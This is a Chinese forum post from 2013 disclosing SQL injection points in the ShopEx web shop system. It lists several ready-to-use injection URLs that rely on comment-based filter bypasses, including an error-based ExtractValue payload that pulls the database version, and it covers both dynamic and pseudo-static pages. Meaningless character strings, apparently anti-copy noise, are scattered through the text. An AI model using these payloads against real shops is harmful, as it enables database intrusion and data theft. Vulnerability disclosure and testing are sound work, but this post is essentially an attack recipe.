注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术… * d1 A5 w4 ~" c% @; f9 ?) y$ L' w
3 [' ?3 l+ H2 _4 ]! L好吧,我扯远了~~$ h0 B+ n) Z& K# _& ~& y
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
3 n$ {4 F0 O( j1 o3 a不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下: & C; } b W4 i. h, S" X
, A# a3 r$ q- T( t$ R9 E) `" S2 W( Thttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html - P% d5 M1 p0 s8 i/ U$ j+ ]
y+ @6 g5 I2 @& I$ e7 U$ V0 O
http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
: E4 A% N. z* p$ F( M9 k# @' J9 X+ \7 i8 I9 B+ S, H$ M6 d
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html & ?: _2 F) l/ b! y( Y8 m2 g
! n/ M! b7 Y7 a5 S2 Z! \http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html / k2 Q9 f& S+ K. i$ o0 t k
. U% t7 C8 ^* C ^; t& { 0 Q, t( W- W( y" A- \
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
. k! K& @: q# i如何注入就不多说了,10多年的东西了…不会也会了… - T3 O0 y6 g6 F, i# w
" H9 w& _; n0 a! r& ]( W5 C( p- u
- c5 f1 f2 P z: d
e! W; P0 B* F0 D5 S* H8 j
|
发表于 2013-2-19 08:31:27
收藏
支持
反对